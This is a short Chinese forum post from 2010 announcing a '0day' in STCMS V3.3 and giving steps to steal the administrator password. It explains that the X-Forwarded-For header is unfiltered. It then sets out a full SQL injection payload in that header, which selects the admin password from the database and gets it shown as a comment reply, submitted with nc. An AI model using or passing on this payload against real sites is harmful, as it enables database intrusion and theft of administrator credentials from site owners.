STCMS V3.3 暴管理员密码0DAY漏洞

etcat · 发表于 2010-6-2 21:06:47


	STCMS V3.3 暴管理员密码0DAY漏洞影响版本：STCMS V3.3 官方地址： http://www.phpstcms.com/ 漏洞产生原因：没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR]，从而将恶意注射语句写入数据库中。利用步骤： 1. 进入有评论的页面，先评论一个并抓包。 2. 在包中添加一条： X-Forwarded-For: 127.0.0.1'',(select pwd from stcms_admin where id =1))#并保存 3. NC提交 4. 此时又添加了一条留言，并且多了一个回复，内容就是管理员的密码。

Bellain · 发表于 2010-6-2 22:24:01

相关帖子